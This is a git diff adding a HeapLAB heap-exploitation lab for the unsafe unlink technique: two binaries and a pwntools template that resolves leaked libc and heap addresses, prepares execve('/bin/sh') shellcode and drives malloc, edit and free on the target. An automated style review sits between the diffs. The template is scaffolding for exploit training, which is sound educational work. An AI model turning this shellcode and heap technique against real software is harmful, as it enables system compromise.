Diffstat (limited to 'HeapLAB/unsafe_unlink')
-rwxr-xr-xHeapLAB/unsafe_unlink/demobin0 -> 9328 bytes
-rwxr-xr-xHeapLAB/unsafe_unlink/pwntools_template.py72
-rwxr-xr-xHeapLAB/unsafe_unlink/unsafe_unlinkbin0 -> 16072 bytes
3 files changed, 72 insertions, 0 deletions
diff --git a/HeapLAB/unsafe_unlink/demo b/HeapLAB/unsafe_unlink/demo
new file mode 100755
index 0000000..201b741
--- /dev/null
+++ b/HeapLAB/unsafe_unlink/demo
Binary files differ
diff --git a/HeapLAB/unsafe_unlink/pwntools_template.py b/HeapLAB/unsafe_unlink/pwntools_template.py
new file mode 100755
index 0000000..8dd9d69
--- /dev/null
+++ b/HeapLAB/unsafe_unlink/pwntools_template.py
@@ -0,0 +1,72 @@
+#!/usr/bin/python3
+from pwn import *
+
+elf = context.binary = ELF("unsafe_unlink")
+libc = elf.libc
+
+gs = '''
+continue
+'''
+def start():
+ if args.GDB:
+ return gdb.debug(elf.path, gdbscript=gs)
+ else:
+ return process(elf.path)
+
+# Index of allocated chunks.
+index = 0
+
+# Select the "malloc" option; send size.
+# Returns chunk index.
+def malloc(size):
+ global index
+ io.send("1")
+ io.sendafter("size: ", f"{size}")
+ io.recvuntil("> ")
+ index += 1
+ return index - 1
+
+# Select the "edit" option; send index & data.
+def edit(index, data):
+ io.send("2")
+ io.sendafter("index: ", f"{index}")
+ io.sendafter("data: ", data)
+ io.recvuntil("> ")
+
+# Select the "free" option; send index.
+def free(index):
+ io.send("3")
+ io.sendafter("index: ", f"{index}")
+ io.recvuntil("> ")
+
+io = start()
+
+# This binary leaks the address of puts(), use it to resolve the libc load address.
+io.recvuntil("puts() @ ")
+libc.address = int(io.recvline(), 16) - libc.sym.puts
+
+# This binary leaks the heap start address.
+io.recvuntil("heap @ ")
+heap = int(io.recvline(), 16)
+io.recvuntil("> ")
+io.timeout = 0.1
+
+# =============================================================================
+
+# =-=-=- EXAMPLE -=-=-=
+
+# Prepare execve("/bin/sh") shellcode with a jmp over where the fd will be written.
+shellcode = asm("jmp shellcode;" + "nop;"*0x16 + "shellcode:" + shellcraft.execve("/bin/sh"))
+
+# Request a small chunk.
+small_chunk = malloc(0x88)
+
+# Edit the small chunk.
+edit(small_chunk, "X"*32)
+
+# Free the small chunk.
+free(small_chunk)
+
+# =============================================================================
+
+io.interactive()
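Review bot: The `index` parameter of `edit()` and `free()` shadows the module-level `index` counter that `malloc()` mutates through `global index`, so the same name means two different things within a few lines and the `global` statement is easy to misread; renaming the counter, e.g. `next_index = 0` and `global next_index`, removes the ambiguity without changing the helpers' signatures. The three helpers also read the module-level `io`, which is only bound at `io = start()` further down the hunk, so calling any of them earlier raises `NameError`; a comment above `malloc()` such as `# These helpers use the module-level io tube created by start() below.` would make that ordering dependency explicit. The comment `Returns chunk index.` on `malloc()` describes a locally maintained counter rather than a value read back from the program, so it presumably assumes the binary hands out indices sequentially from 0; stating that assumption in the comment would help anyone adapting the template. Newer pwntools releases warn when `send`/`sendafter` receive `str` instead of `bytes`, so `io.send(b"1")` and `f"{size}".encode()` would keep the template quiet under that setting, though the current form does work.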
diff --git a/HeapLAB/unsafe_unlink/unsafe_unlink b/HeapLAB/unsafe_unlink/unsafe_unlink
new file mode 100755
index 0000000..190fe07
--- /dev/null
+++ b/HeapLAB/unsafe_unlink/unsafe_unlink
Binary files differ